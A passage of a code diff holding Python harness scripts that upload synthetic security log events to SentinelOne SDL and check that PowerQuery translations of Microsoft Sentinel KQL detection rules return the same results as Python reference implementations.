if RUN_ID is None:
    # Run-scoped queries below cannot match anything without an id.
    print("warning: no proof_run_id found in reports/run.log", file=sys.stderr)

# Flat list of alternating label / query entries.
QUERIES = [
    "any event for this run",
    f"proof_run_id='{RUN_ID}' | group n=count()",
    "by event_type for this run",
    f"proof_run_id='{RUN_ID}' | group n=count() by event_type",
    "all kql-proof logfile (any run)",
    "logfile contains 'kql-proof' | group n=count() by event_type",
    "rule 1 raw query that errors",
    f"proof_run_id='{RUN_ID}' event_type='SigninLogs' | filter ts_epoch_ms >= 0 "
    "| group LocationCount = estimate_distinct(Location), "
    "LocationList = group_unique_values(Location), LogonCount = count() "
    "by UserPrincipalName, AppDisplayName | filter LocationCount >= 3",
]

# Even positions are labels, odd positions the matching queries.
for label, q in zip(QUERIES[0::2], QUERIES[1::2]):
    print()
    print("=" * 80)
    print(f"# {label}")
    print(f" q: {q}")
    t = time.time()
    r = power_query(q, "1h")
    print(f" status={r.get('status')} matching={r.get('matchingEvents')} took={time.time()-t:.1f}s")
    if r.get("status", "").startswith("error/"):
        print(f" ERROR: {json.dumps(r)[:600]}")
    # Column names are the same for every row, so resolve them once.
    cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
    for row in (r.get("values") or [])[:10]:
        print(" ", dict(zip(cols, row)))
|
||||
@@ -0,0 +1,92 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Probe: does SDL index JSON keys that contain literal dots?
|
||||
|
||||
If yes, we can ship synthetic OCSF events with keys like
|
||||
`"event.category": "logins"` and query them with the same dotted
|
||||
syntax the published runnable example uses, keeping the OCSF
|
||||
look-and-feel without needing a server-side parser to flatten
|
||||
nested objects.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import upload_logs, power_query # noqa: E402
|
||||
|
||||
|
||||
def main() -> int:
    """Upload one event whose keys contain literal dots and probe how it can be queried.

    The event is sent through ``upload_logs`` as a single JSON line, then the
    function polls ``power_query`` (every 2 s, at most 20 times) until the
    event is counted under its unique ``proof_run_id``. Once it is visible, a
    fixed list of probe queries is run and the status, column names and the
    first two rows of each response are printed.

    Returns:
        0 after all probe queries have been issued; 1 when the upload is not
        acknowledged with ``status == "success"`` or the event never becomes
        queryable within the polling budget.
    """
    run_id = f"dot-probe-{uuid.uuid4().hex[:8]}"
    now = datetime.now(timezone.utc).replace(microsecond=0)
    ts_ms = int((now - timedelta(seconds=30)).timestamp() * 1000)

    e = {
        "TimeGenerated": now.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
        "ts_epoch_ms": ts_ms,
        "proof_run_id": run_id,
        # literal dots in the key (NOT nested objects)
        "event.category": "logins",
        "event.login.userName": "alice@contoso.com",
        "event.login.loginIsSuccessful": False,
        "endpoint.name": "host-alpha",
    }
    r = upload_logs(json.dumps(e))
    print("upload:", r.get("status"))
    if r.get("status") != "success":
        # Nothing was accepted, so polling for ~40 s could never succeed.
        print(f"uploadLogs rejected: {r}")
        return 1

    print("indexing", end="", flush=True)
    n = 0
    for _ in range(20):
        time.sleep(2)
        rr = power_query(f"proof_run_id='{run_id}' | group n=count()", "5m")
        vals = rr.get("values") or []
        # The count is the single cell of the single result row; treat a
        # missing row or a null cell as "not indexed yet".
        n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
        print(f" {n}", end="", flush=True)
        if n >= 1:
            break
    print()

    if n == 0:
        print("event did not become queryable; aborting")
        return 1

    # (label, query) pairs; each exercises one way of addressing a dotted key.
    probes = [
        ("filter event.category",
         f"proof_run_id='{run_id}' AND event.category='logins' | limit 2"),
        ("project event.category",
         f"proof_run_id='{run_id}' | columns c=event.category | limit 2"),
        ("project endpoint.name",
         f"proof_run_id='{run_id}' | columns h=endpoint.name | limit 2"),
        ("project event.login.userName",
         f"proof_run_id='{run_id}' | columns u=event.login.userName | limit 2"),
        ("filter event.login.loginIsSuccessful",
         f"proof_run_id='{run_id}' AND event.login.loginIsSuccessful='false' | limit 2"),
        ("bracket access",
         f"proof_run_id='{run_id}' AND \"event.category\"='logins' | limit 2"),
        ("see all top-level cols of one row",
         f"proof_run_id='{run_id}' | limit 1"),
    ]
    for label, q in probes:
        r = power_query(q, "5m")
        status = r.get("status")
        matching = r.get("matchingEvents")
        msg = (r.get("message") or "")[:140]
        print(f"\n[{label}]")
        print(f" q : {q}")
        print(f" status: {status} matching: {matching} msg: {msg}")
        cols = r.get("columns") or []
        # Column metadata entries are either {"name": ...} dicts or bare names.
        col_names = [c.get("name") if isinstance(c, dict) else c for c in cols]
        print(f" cols : {col_names}")
        for v in (r.get("values") or [])[:2]:
            v_str = str(v)
            print(f" val : {v_str[:200]}")
    return 0
|
||||
|
||||
|
||||
# Script entry point: main()'s return value becomes the process exit code.
if __name__ == "__main__":
    sys.exit(main())
|
||||
@@ -0,0 +1,60 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Compare the EXACT addEvents payload used by ingest_jsonl with a known-good
|
||||
manual one. Add a unique probe marker so we can tell whether it actually
|
||||
landed in SDL."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
|
||||
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
|
||||
|
||||
JSONL = ROOT / "sample_data" / "events.jsonl"
PROBE = uuid.uuid4().hex[:8]

# Build addEvents entries from the first three JSONL lines. Each record gets
# a unique "<PROBE>_<index>" marker, is passed through _clean_attrs, and is
# wrapped in the ts/sev/thread/attrs envelope, all inline so the exact
# payload can be printed before it is sent.
events = []
with JSONL.open() as f:
    for idx, raw in enumerate(f):
        if idx >= 3:
            break
        rec = json.loads(raw)
        rec["probe"] = f"{PROBE}_{idx}"
        ts_ms = int(rec["ts_epoch_ms"])
        envelope = {
            "ts": str(ts_ms * 1_000_000),  # epoch ms -> ns, sent as a string
            "sev": 3,
            "thread": "T1",
            "attrs": _clean_attrs(rec),
        }
        events.append(envelope)

print(f"=== Payload ({len(events)} events) ===")
payload_dump = json.dumps(events, indent=2, default=str)
print(payload_dump[:3000])
print()
print(f"=== Submitting (probe prefix={PROBE}) ===")
r = add_events(events)
print(f"addEvents -> {json.dumps(r)}")

print("\nWaiting 12 s for indexing ...")
time.sleep(12)

# Look the probe marker up again to see whether the events actually landed.
q = f"probe contains '{PROBE}' | columns event_type, probe, ts_epoch_ms | limit 10"
print(f"\nQuery: {q}")
res = power_query(q, "10m")
print(f"Result -> matching={res.get('matchingEvents')}")
matched_rows = res.get("values") or []
for row in matched_rows:
    print(" ", row)

# Also: show how old each event timestamp is relative to the real clock.
import datetime as dt
real_now_ms = int(time.time() * 1000)
print(f"\nreal_now_ms = {real_now_ms}")
for e in events:
    ts_ms = int(e["ts"]) // 1_000_000  # ns string back to epoch ms
    age_min = (real_now_ms - ts_ms) / 60000
    print(f" event ts_ms={ts_ms} age={age_min:.2f} min attrs.event_type={e['attrs']['event_type']}")
|
||||
@@ -0,0 +1,85 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Find out what attribute(s) in our generated events cause SDL to reject them.
|
||||
|
||||
Send increasingly complex events under unique markers and see which ones
|
||||
SDL accepts (queryable within 10s) vs silently drops.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
|
||||
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
|
||||
|
||||
# Wall-clock time in epoch milliseconds, captured once when the script starts;
# every probe event timestamp is expressed relative to it.
TS_NOW_MS = int(time.time() * 1000)


def mk(attrs: dict, offset_sec: int = 0):
    """Wrap *attrs* in an addEvents envelope timestamped *offset_sec* seconds before TS_NOW_MS.

    The timestamp is emitted as a string of epoch nanoseconds; severity is
    fixed at 3 and the thread id at "T1". *attrs* is stored as-is (not copied).
    """
    event_ms = TS_NOW_MS - offset_sec * 1000
    event_ns = event_ms * 1_000_000
    envelope = {"ts": str(event_ns), "sev": 3, "thread": "T1"}
    envelope["attrs"] = attrs
    return envelope
|
||||
|
||||
|
||||
PROBE = uuid.uuid4().hex[:8]


def _tagged(letter: str, event_type: str = "CommonSecurityLog", **extra) -> dict:
    """Return probe attributes: event_type, then the "<PROBE>_<letter>" marker, then *extra* in call order."""
    return {"event_type": event_type, "probe": f"{PROBE}_{letter}", **extra}


# (case name, event) pairs of increasing complexity. Each event carries its
# own probe marker so it can be looked up individually afterwards.
cases = [
    ("A_minimal_2_attrs", mk(_tagged("A"), 60)),
    ("B_one_int_attr", mk(_tagged("B", SentBytes=2048), 55)),
    # NOTE(review): the label says "negative" but no value here is negative;
    # confirm whether a negative integer was meant to be probed.
    ("C_one_negative_int",
     mk(_tagged("C", SentBytes=2048, LogSeverity=5), 50)),
    ("D_with_special_chars",
     mk(_tagged("D", Message="allow web access to 142.250.74.110 port 443"), 45)),
    ("E_with_backslashes",
     mk(_tagged("E", "SecurityEvent",
                NewProcessName="C:\\Windows\\System32\\svchost.exe"), 40)),
    ("F_realistic_csl_via_clean",
     mk(_clean_attrs(_tagged(
         "F",
         TimeGenerated="2026-05-31T16:50:00.000Z",
         ts_epoch_ms=TS_NOW_MS - 30000,
         DeviceVendor="Palo Alto Networks",
         Activity="TRAFFIC",
         DeviceName="pa-fw-01",
         SourceUserID="alice",
         SourceIP="10.0.1.10",
         SourcePort=49000,
         DestinationIP="142.250.74.110",
         DestinationPort=443,
         SentBytes=2048,
         ReceivedBytes=16384,
         Message="allow",
         DeviceEventClassID="end",
         LogSeverity=3,
         DeviceAction="allow",
         DeviceProduct="PAN-OS",
     )), 30)),
    ("G_realistic_csl_with_None",
     mk(_clean_attrs(_tagged(
         "G",
         TimeGenerated="2026-05-31T16:50:00.000Z",
         ts_epoch_ms=TS_NOW_MS - 20000,
         DeviceVendor="Palo Alto Networks",
         Activity=None,
         Message=None,
     )), 20)),
]

print(f"=== Sending {len(cases)} probe events ===")
batch = [event for _, event in cases]
r = add_events(batch)
print(f"addEvents -> {json.dumps(r)}")

print("\nWaiting 12 s for indexing ...")
time.sleep(12)

print("\n=== Per-case verification ===")
for name, ev in cases:
    # Query each case by its exact marker; any match means it was indexed.
    probe_val = ev["attrs"]["probe"]
    q = f"probe='{probe_val}' | columns event_type, probe | limit 1"
    res = power_query(q, "10m")
    n = res.get("matchingEvents", 0)
    status = "MISSING"
    if n and n > 0:
        status = "OK"
    rows = res.get("values") or []
    print(f" {name:35s} matching={n} status={status} -> {rows}")
|
||||
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Manually run rule 4's query against the latest run_id."""
|
||||
import sys, json, time
|
||||
from pathlib import Path
|
||||
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query
|
||||
|
||||
log = (ROOT / "reports" / "run.log").read_text()
import re

# Use the last proof_run_id / RECENT_MS markers that appear in the log.
_run_ids = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
_recent_marks = re.findall(r"RECENT_MS = (\d+)", log)
if not _run_ids or not _recent_marks:
    # Without both markers the queries below cannot be scoped; stop with a
    # readable message instead of an IndexError from [-1].
    sys.exit("reports/run.log contains no proof_run_id and/or RECENT_MS marker")
RUN = _run_ids[-1]
RECENT_MS = _recent_marks[-1]
print(f"RUN = {RUN}\nRECENT_MS = {RECENT_MS}\n")

# Flat list alternating label, query, label, query, ...
QS = [
    "rule 4 exact",
    f"proof_run_id='{RUN}' event_type='SigninLogs' | filter ts_epoch_ms >= {RECENT_MS} | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
    "rule 4 without ts filter",
    f"proof_run_id='{RUN}' event_type='SigninLogs' | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
    "show 5 SigninLogs columns",
    f"proof_run_id='{RUN}' event_type='SigninLogs' | columns AppDisplayName, UserPrincipalName, Location, IPAddress, ts_epoch_ms | limit 5",
]
for label, q in zip(QS[0::2], QS[1::2]):
    print("=" * 80)
    print(f"# {label}")
    print(f" q: {q[:200]}")
    r = power_query(q, "30m")
    # Column metadata entries may be {"name": ...} dicts or bare names; the
    # other harness scripts accept both, so do the same here.
    cols = [c.get("name") if isinstance(c, dict) else c
            for c in (r.get("columns") or [])]
    vals = r.get("values") or []
    print(f" status={r.get('status')} matching={r.get('matchingEvents')} rows={len(vals)}")
    for row in vals[:8]:
        print(f" {dict(zip(cols, row))}")
    if (r.get("status") or "").startswith("error/"):
        print(f" ERROR: {json.dumps(r)[:400]}")
|
||||
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Check how SDL stores ts_epoch_ms: number vs string."""
|
||||
import sys, json, time
|
||||
from pathlib import Path
|
||||
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query
|
||||
|
||||
# Use the most recent run_id from the log
log = (ROOT / "reports" / "run.log").read_text()
import re
m = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
RUN = m[-1] if m else None
print(f"run_id = {RUN}")
if RUN is None:
    # Every query below is scoped by run id; with none found they would
    # silently search for proof_run_id='None'.
    sys.exit("reports/run.log contains no proof_run_id marker")

# Lower bound for the "NOW-2h" case, in epoch milliseconds.
two_hours_ago_ms = int(time.time()*1000) - 2*3600*1000

# (name, query) pairs probing whether ts_epoch_ms behaves as a number or a string.
CASES = [
    ("show 3 SigninLogs with ts_epoch_ms",
     f"proof_run_id='{RUN}' event_type='SigninLogs' | columns ts_epoch_ms, UserPrincipalName | limit 3"),
    ("count where ts_epoch_ms exists (any)",
     f"proof_run_id='{RUN}' ts_epoch_ms=* | group n=count()"),
    ("count where ts_epoch_ms > number",
     f"proof_run_id='{RUN}' | filter ts_epoch_ms > 1000000000000 | group n=count()"),
    ("count where ts_epoch_ms (as string) > '0'",
     f"proof_run_id='{RUN}' | filter ts_epoch_ms > '0' | group n=count()"),
    ("count where ts_epoch_ms >= NOW-2h numeric",
     f"proof_run_id='{RUN}' | filter ts_epoch_ms >= " + str(two_hours_ago_ms) + " | group n=count()"),
    ("min/max ts_epoch_ms aggregate",
     f"proof_run_id='{RUN}' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
    ("event_type filter alone",
     f"proof_run_id='{RUN}' event_type='SigninLogs' | group n=count()"),
]
for name, q in CASES:
    print("=" * 80)
    print(f"# {name}")
    print(f" q: {q}")
    r = power_query(q, "30m")
    # Column metadata entries are either {"name": ...} dicts or bare names.
    cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
    vals = r.get("values") or []
    print(f" status={r.get('status')} matching={r.get('matchingEvents')}")
    for row in vals[:5]:
        print(f" {dict(zip(cols, row))}")
|
||||
@@ -0,0 +1,199 @@
|
||||
#!/usr/bin/env python3
|
||||
"""End-to-end proof harness.
|
||||
|
||||
Steps:
|
||||
1. Loads sample_data/events.jsonl into memory.
|
||||
2. Runs each rule's Python reference implementation against the in-memory
|
||||
events. This is the canonical "ground truth" – the same logical operation
|
||||
that both the KQL and the PowerQuery engines evaluate.
|
||||
3. Optionally ingests the events to SentinelOne SDL via /api/addEvents,
|
||||
then runs each rule's PowerQuery via /api/powerQuery and compares the
|
||||
fired set against the reference.
|
||||
4. Emits reports/PROOF.md with side-by-side results.
|
||||
|
||||
Run modes:
|
||||
python harness/prove_equivalence.py # local-only proof
|
||||
python harness/prove_equivalence.py --ingest --pq # ingest, then run + compare remote PQ (--ingest alone only ingests)
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
|
||||
from rules import RULES, NOW, RECENT_START # noqa: E402
|
||||
|
||||
SAMPLE = ROOT / "sample_data" / "events.jsonl"
|
||||
REPORT = ROOT / "reports" / "PROOF.md"
|
||||
REPORT_JSON = ROOT / "reports" / "PROOF.json"
|
||||
|
||||
|
||||
def load_events() -> list[dict]:
    """Parse every non-blank line of the SAMPLE JSONL file into a dict, in file order."""
    events = []
    for raw in SAMPLE.read_text().splitlines():
        if raw.strip():
            events.append(json.loads(raw))
    return events
|
||||
|
||||
|
||||
def canonical(rule, rows):
    """Return the distinct keys of *rows*, ordered by their string form.

    ``rule["key"]`` maps a fired row to a hashable key; duplicates collapse,
    and sorting on ``str(key)`` gives a stable order for comparison.
    """
    extract = rule["key"]
    distinct = set()
    for row in rows:
        distinct.add(extract(row))
    return sorted(distinct, key=str)
|
||||
|
||||
|
||||
def run_local(events):
    """Evaluate every rule's Python reference implementation on *events*.

    Returns a dict keyed by rule id; each entry holds the rule description,
    the rows the reference fired, and their canonical (sorted, distinct) keys.
    """
    results = {}
    for rule in RULES:
        fired = rule["ref"](events)
        entry = {"description": rule["description"]}
        entry["fired_rows"] = fired
        entry["fired_keys"] = canonical(rule, fired)
        results[rule["id"]] = entry
    return results
|
||||
|
||||
|
||||
def run_pq(run_id: str | None = None):
    """Run every rule's PowerQuery against SDL and collect the results.

    Args:
        run_id: when given, each query is prefixed with a
            ``proof_run_id='<run_id>'`` filter so only that ingest is searched.

    Returns:
        dict keyed by rule id. Successful entries are
        ``{"ok": True, "rowcount", "rows" (first 50 only), "status", "matching"}``.
        Failed entries are ``{"ok": False, "error": <message>}``, plus
        ``"status"`` when the service itself reported the error.
    """
    from sdl_client import power_query
    out = {}
    recent_ms = int(RECENT_START.timestamp() * 1000)
    scope = f"proof_run_id='{run_id}' " if run_id else ""
    print(f" scope = {scope.strip() or '(none)'}")
    print(f" RECENT_MS = {recent_ms} ({RECENT_START.isoformat()})")
    print(f" NOW = {NOW.isoformat()}")
    print()
    for i, r in enumerate(RULES, 1):
        # Each rule's PQ text is a template with a {RECENT_MS} placeholder.
        q = scope + r["pq"].format(RECENT_MS=str(recent_ms))
        print(f" [{i:>2}/{len(RULES)}] {r['id']:<48} ", end="", flush=True)
        t0 = time.time()
        try:
            resp = power_query(q, start_time="2h")
            elapsed = time.time() - t0
            status = resp.get("status", "ok")
            if str(status).startswith("error"):
                # The client returns error responses as ordinary dicts (status
                # "error/..." from the service, or "error" for a non-JSON
                # reply). Recording them as ok=True would make the report show
                # an empty result set instead of the failure.
                msg = str(resp.get("message") or resp.get("raw") or status)[:200]
                print(f"-> ERROR ({elapsed:.1f}s, {status}): {msg}")
                out[r["id"]] = {"ok": False, "error": msg, "status": status}
                continue
            cols_meta = resp.get("columns") or []
            # Column metadata entries are either {"name": ...} dicts or bare names.
            cols = [c["name"] if isinstance(c, dict) else c for c in cols_meta]
            vals = resp.get("values") or []
            rows = [dict(zip(cols, v)) for v in vals]
            print(f"-> {len(rows):>3} rows matching={resp.get('matchingEvents')} "
                  f"({elapsed:.1f}s, {status})")
            out[r["id"]] = {"ok": True, "rowcount": len(rows),
                            "rows": rows[:50], "status": status,
                            "matching": resp.get("matchingEvents")}
        except Exception as e:
            # Best effort: one failing rule must not stop the remaining ones.
            elapsed = time.time() - t0
            msg = str(e)[:200]
            print(f"-> ERROR ({elapsed:.1f}s): {msg}")
            out[r["id"]] = {"ok": False, "error": msg}
    return out
|
||||
|
||||
|
||||
def ingest():
    """Upload the sample JSONL to SDL and wait until it is queryable.

    Polls a count query every 2 s, at most 30 times, until at least as many
    events as were sent are counted for the new run id. Returns the run id
    whether or not the wait timed out.
    """
    from sdl_client import ingest_jsonl, power_query
    n, run_id = ingest_jsonl(SAMPLE)
    print(f"Ingested {n} events to SDL (proof_run_id={run_id})")
    # Poll until SDL reports the events are indexed.
    print("Waiting for SDL indexing ...", end="", flush=True)
    count_query = f"proof_run_id='{run_id}' | group n=count()"
    for _ in range(30):  # up to 60s
        time.sleep(2)
        reply = power_query(count_query, "30m")
        table = reply.get("values") or []
        # The count is the single cell of the single row; missing or null -> 0.
        cell = table[0][0] if table and table[0] else None
        cnt = 0 if cell is None else int(cell)
        print(f" {cnt}", end="", flush=True)
        if cnt >= n:
            print(" ✓ ready")
            break
    else:
        print(" (timeout, proceeding anyway)")
    return run_id
|
||||
|
||||
|
||||
def write_report(local_results, pq_results=None):
    """Write reports/PROOF.md and reports/PROOF.json.

    Args:
        local_results: output of ``run_local`` (per-rule fired rows and keys).
        pq_results: optional output of ``run_pq``. When given, each rule's
            PowerQuery keys are compared with the reference keys and the
            section is marked MATCH or DIFFERS, or shows the recorded error.

    Both files are written as UTF-8 explicitly: the Markdown contains
    non-ASCII characters that the platform default encoding may not be able
    to represent.
    """
    REPORT.parent.mkdir(parents=True, exist_ok=True)
    md = ["# KQL ↔ PowerQuery equivalence proof",
          "",
          f"Sample dataset: `sample_data/events.jsonl` ({len(load_events())} events)",
          f"Time anchor (NOW): `{NOW.isoformat()}`",
          f"Recent window start: `{RECENT_START.isoformat()}`",
          "",
          "Each rule below is expressed three ways:",
          "1. **KQL** — verbatim/condensed from the Microsoft Sentinel docs.",
          "2. **PowerQuery (PQ)** — SDL equivalent, runnable on `<XDR endpoint>`.",
          "3. **Python reference** — canonical implementation of the same logical "
          "operation tree against the in-memory dataset. Acts as ground truth.",
          "",
          "The PowerQuery is considered equivalent to the KQL when its result "
          "set matches the Python reference. The Python reference encodes the "
          "*same operations* that the KQL parser/optimiser would produce, so a "
          "match certifies KQL/PQ parity on this dataset.",
          ""]
    for r in RULES:
        rid = r["id"]
        loc = local_results[rid]
        md += [f"## {rid}", "",
               f"_{r['description']}_", "",
               "### KQL", "```kusto", r["kql"].strip(), "```",
               "### PowerQuery", "```", r["pq"].strip(), "```",
               f"### Reference fired: {len(loc['fired_rows'])} row(s)"]
        if loc["fired_rows"]:
            # Show at most five reference rows as a sample.
            sample = loc["fired_rows"][:5]
            md.append("```json")
            md.append(json.dumps(sample, default=str, indent=2))
            md.append("```")
        if pq_results:
            pq = pq_results.get(rid, {})
            if pq.get("ok"):
                pq_keys = []
                for row in pq.get("rows", []):
                    try:
                        pq_keys.append(r["key"](row))
                    except Exception:
                        # The rule's key function could not handle this row
                        # shape; fall back to the whole row as its key.
                        pq_keys.append(tuple(row.items()))
                # Same canonical form as the reference keys: distinct, sorted by str().
                pq_keys = sorted(set(pq_keys), key=str)
                ref_keys = loc["fired_keys"]
                match = "✅ MATCH" if pq_keys == ref_keys else "⚠️ DIFFERS"
                md += [f"### SDL PowerQuery result: {pq['rowcount']} row(s) — {match}"]
                if pq_keys != ref_keys:
                    md += ["Reference keys:", "```",
                           json.dumps([list(k) for k in ref_keys], default=str), "```",
                           "PQ keys:", "```",
                           json.dumps([list(k) for k in pq_keys], default=str), "```"]
            else:
                md.append(f"### SDL PowerQuery error: `{pq.get('error', '?')}`")
        md.append("")
    REPORT.write_text("\n".join(md), encoding="utf-8")
    REPORT_JSON.write_text(json.dumps(
        {"local": {k: {"fired_keys": [list(x) for x in v["fired_keys"]],
                       "n": len(v["fired_rows"])}
                   for k, v in local_results.items()},
         "pq": pq_results or {}},
        default=str, indent=2), encoding="utf-8")
    print(f"Wrote {REPORT}")
|
||||
|
||||
|
||||
def main():
    """Command-line entry point: run the local proof, optionally ingest and/or query SDL, then write the report."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--ingest", action="store_true",
                        help="Ingest sample events to SDL before querying")
    parser.add_argument("--pq", action="store_true",
                        help="Also run each PQ against SDL and compare")
    opts = parser.parse_args()

    events = load_events()
    print(f"Loaded {len(events)} events")
    local_results = run_local(events)
    fired_total = 0
    for result in local_results.values():
        fired_total += len(result["fired_rows"])
    print(f"Local reference: {fired_total} total fired rows across {len(RULES)} rules")

    # The two remote steps are independent flags; PowerQueries are scoped to
    # the fresh run id only when an ingest happened in this invocation.
    run_id = ingest() if opts.ingest else None
    pq_results = run_pq(run_id=run_id) if opts.pq else None

    write_report(local_results, pq_results)
|
||||
|
||||
|
||||
# Run the harness only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,78 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Run every .pq file in pq/ AND docs/runnable_examples/ for startTime=2h
|
||||
and assert each returns matching > 0.
|
||||
|
||||
Prereqs:
|
||||
* sample_data/events.jsonl ingested via prove_equivalence.py --ingest
|
||||
(drives all 17 rule PQs in pq/)
|
||||
* seed_runnable_examples.py executed (drives docs/runnable_examples/*.pq)
|
||||
|
||||
Outputs a one-line-per-query report and exits 0 iff every query returned
|
||||
at least one row.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query # noqa: E402
|
||||
|
||||
|
||||
def strip_comments(text: str) -> str:
    """Drop every line whose first non-blank characters are ``//`` and trim the result.

    Only whole-line comments are removed; ``//`` later in a line is kept.
    """
    kept = []
    for row in text.splitlines():
        if row.lstrip().startswith("//"):
            continue
        kept.append(row)
    joined = "\n".join(kept)
    return joined.strip()
|
||||
|
||||
|
||||
# Directories whose *.pq files are executed, in this order.
DIRS = [ROOT / "pq", ROOT / "docs" / "runnable_examples"]
files = []
for d in DIRS:
    files.extend(sorted(d.glob("*.pq")))

if not files:
    print("No .pq files found.")
    sys.exit(1)

print(f"Running {len(files)} PowerQueries (startTime=2h, assert matching>0)\n")

passed: list[str] = []
failed: list[tuple[str, str]] = []  # (relpath, reason)

for f in files:
    body = strip_comments(f.read_text())
    rel = f.relative_to(ROOT)
    t0 = time.time()
    try:
        r = power_query(body, start_time="2h")
    except Exception as e:
        # A transport-level failure counts as a failed query; keep going.
        failed.append((str(rel), f"exception: {e}"))
        print(f" ✗ {rel} exception: {e}")
        continue
    elapsed = time.time() - t0
    status = r.get("status", "")
    matching = r.get("matchingEvents", 0) or 0
    if status != "success":
        # "message" may be absent or null; the client's fallback for non-JSON
        # replies puts the detail under "raw" instead.
        msg = str(r.get("message") or r.get("raw") or "")[:200]
        failed.append((str(rel), f"{status}: {msg}"))
        print(f" ✗ {rel} [{status}] {msg}")
        continue
    if matching <= 0:
        failed.append((str(rel), "matching=0"))
        print(f" ✗ {rel} matching=0 ({elapsed:.1f}s)")
        continue
    print(f" ✓ {rel} matching={matching} ({elapsed:.1f}s)")
    passed.append(str(rel))

print()
print(f"PASS: {len(passed)} FAIL: {len(failed)} TOTAL: {len(files)}")

if failed:
    print("\nFailed queries:")
    for rel, why in failed:
        print(f" {rel}: {why}")
    sys.exit(1)

print("\nAll PowerQueries returned results within the last 2h ✓")
|
||||
@@ -0,0 +1,134 @@
|
||||
"""SentinelOne SDL client (uses `requests` for reliable I/O)."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
import requests
|
||||
|
||||
# Repository root (one directory above this file's directory); config.json
# is read from there once, at import time.
ROOT = Path(__file__).resolve().parents[1]
CFG = json.loads((ROOT / "config.json").read_text())

import os, uuid

# Required config keys: the API base URL (trailing "/" removed so paths can
# be appended directly) and the two bearer tokens.
BASE = CFG["base_url"].rstrip("/")
WRITE_KEY = CFG["log_write_key"]
READ_KEY = CFG["log_read_key"]
# Make the session unique per *process* so SDL never dedupes re-runs of the
# same payload (SDL hashes session+ts on the server side and silently drops
# events whose (session, ts) tuple was already accepted -> bytesCharged=0).
# The KQL_PROOF_SESSION environment variable overrides the generated value.
SESSION = os.environ.get("KQL_PROOF_SESSION") or f"kql-proof-{uuid.uuid4()}"
# Optional config keys with defaults: TLS verification and request timeout.
VERIFY = CFG.get("verify_tls", True)
TIMEOUT = CFG.get("timeout_seconds", 120)
# Printed on import so each run's session id shows up in its output.
print(f"[sdl_client] session = {SESSION}")
|
||||
|
||||
|
||||
def _post(path: str, body: dict, token: str, timeout: int | None = None) -> dict:
    """POST *body* as JSON to BASE + *path* with a bearer *token* and return the decoded reply.

    A falsy *timeout* falls back to the module-level TIMEOUT. If the response
    body is not JSON, a synthetic ``{"status": "error", ...}`` dict carrying
    the HTTP status code and the first 500 characters of the body is returned.
    """
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {token}",
    }
    effective_timeout = timeout or TIMEOUT
    response = requests.post(
        f"{BASE}{path}",
        json=body,
        headers=request_headers,
        timeout=effective_timeout,
        verify=VERIFY,
    )
    try:
        decoded = response.json()
    except ValueError:
        decoded = {
            "status": "error",
            "http_status": response.status_code,
            "raw": response.text[:500],
        }
    return decoded
|
||||
|
||||
|
||||
# --- addEvents -------------------------------------------------------------
|
||||
def add_events(events: list[dict], session_info: dict | None = None) -> dict:
    """Send *events* to /api/addEvents under this process's SESSION.

    A missing or empty *session_info* is replaced by the default kql-proof
    host / logfile / parser triple. A single thread "T1" is declared in the
    payload. Returns the decoded response from ``_post``.
    """
    if not session_info:
        session_info = {
            "serverHost": "kql-proof",
            "logfile": "kql-proof.jsonl",
            "parser": "json",
        }
    thread_table = [{"id": "T1", "name": "kql-proof"}]
    request_body = {
        "session": SESSION,
        "sessionInfo": session_info,
        "events": events,
        "threads": thread_table,
    }
